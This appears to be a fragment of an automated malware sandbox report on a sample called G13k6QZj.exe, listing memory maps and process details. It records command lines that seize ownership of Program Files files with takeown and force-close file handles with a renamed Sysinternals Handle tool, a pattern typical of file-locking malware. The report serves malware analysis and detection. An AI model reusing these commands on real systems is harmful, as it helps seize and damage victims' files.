|
|
|
- |
| pagefile_0x000000007f190000 | 0x7f190000 | 0x7f1b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f1b8000 | 0x7f1b8000 | 0x7f1bafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1bb000 | 0x7f1bb000 | 0x7f1bdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1be000 | 0x7f1be000 | 0x7f1befff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1bf000 | 0x7f1bf000 | 0x7f1bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #136: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #136 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:45, Reason: Child Process |
| Unmonitor | End Time: 00:02:48, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x494 |
| Parent PID | 0x744 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
590
0x
534
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000cb0000 | 0x00cb0000 | 0x04caffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004cb0000 | 0x04cb0000 | 0x04ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cb0000 | 0x04cb0000 | 0x04cbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04cc3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x04cd1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04cd0000 | 0x04cd4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004ce0000 | 0x04ce0000 | 0x04cf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04d7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d80000 | 0x04d80000 | 0x04d83fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004d90000 | 0x04d90000 | 0x04d90fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04da1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04f1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04e00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e20000 | 0x04e20000 | 0x04f1ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04f20000 | 0x04fddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004fe0000 | 0x04fe0000 | 0x0501ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005020000 | 0x05020000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x05020000 | 0x05049fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005080000 | 0x05080000 | 0x05207fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005210000 | 0x05210000 | 0x05390fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000053a0000 | 0x053a0000 | 0x0679ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x067a0000 | 0x06ad6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e640000 | 0x7e640000 | 0x7e73ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e740000 | 0x7e740000 | 0x7e762fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e765000 | 0x7e765000 | 0x7e767fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e768000 | 0x7e768000 | 0x7e768fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e76b000 | 0x7e76b000 | 0x7e76bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e76d000 | 0x7e76d000 | 0x7e76ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #137: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #137 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:46, Reason: Child Process |
| Unmonitor | End Time: 00:02:47, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x68c |
| Parent PID | 0xb1c (c:\windows\syswow64\cacls.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
89C
0x
54C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x046affff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000046b0000 | 0x046b0000 | 0x046cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000046b0000 | 0x046b0000 | 0x046bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000046c0000 | 0x046c0000 | 0x046c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046d0000 | 0x046d0000 | 0x046d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046d0000 | 0x046d0000 | 0x046dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000046e0000 | 0x046e0000 | 0x046f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004700000 | 0x04700000 | 0x0473ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004740000 | 0x04740000 | 0x0477ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004780000 | 0x04780000 | 0x04783fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004790000 | 0x04790000 | 0x04790fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000047a0000 | 0x047a0000 | 0x047a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x047b0000 | 0x0486dfff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe.mui | 0x04870000 | 0x04874fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004880000 | 0x04880000 | 0x04880fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x0489ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048a0000 | 0x048a0000 | 0x04b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048a0000 | 0x048a0000 | 0x048dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048e0000 | 0x048e0000 | 0x0491ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04920000 | 0x04949fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004920000 | 0x04920000 | 0x04920fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04b1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b20000 | 0x04b20000 | 0x04ca7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004cb0000 | 0x04cb0000 | 0x04e30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e40000 | 0x04e40000 | 0x0623ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06240000 | 0x06576fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fc40000 | 0x7fc40000 | 0x7fd3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fd40000 | 0x7fd40000 | 0x7fd62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fd64000 | 0x7fd64000 | 0x7fd64fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fd66000 | 0x7fd66000 | 0x7fd66fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fd6a000 | 0x7fd6a000 | 0x7fd6cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fd6d000 | 0x7fd6d000 | 0x7fd6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #138: g13k6qzj64.exe
67
0
| Information | Value |
|---|---|
| ID | #138 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:46, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x944 |
| Parent PID | 0x3a8 (c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
6B0
0x
7E0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00240000 | 0x00273fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00246fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x00667fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x01bfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fd63000 | 0x7fd63000 | 0x7fd63fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| g13k6qzj64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff6000 | 0x7ff5ffff6000 | 0x7ff5ffff6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ff8e6590000 | 0x7ff8e6639fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ff8eb180000 | 0x7ff8eb7a7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ff8eba50000 | 0x7ff8ebb27fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ff8ec580000 | 0x7ff8edaa4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (38)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff8ee2d0000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff8ee2f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff8ee2f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff8ee2e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff8ee2ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff8ee2f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff8ee2f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff8ee2f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff8ee2f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff8ee2ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff8ee3bcb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff8ee3c5790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff8ee3bea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff8ee2f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff8ee3bc470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff8ee3c5410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff8ee4142f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff8ee3f95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff8ee413130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff8ee2f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff8ee312720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff8eb92e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff8ee3128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff8ee2e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff8ee312a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff8ee2f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff8ee312bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff8ee2f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff8ee312cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff8ee2e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff8eb8c45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff8ee2e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff8ee2ee960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #139: g13k6qzj64.exe
67
0
| Information | Value |
|---|---|
| ID | #139 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe |
| Command Line | G13k6QZj.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:52, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5c0 |
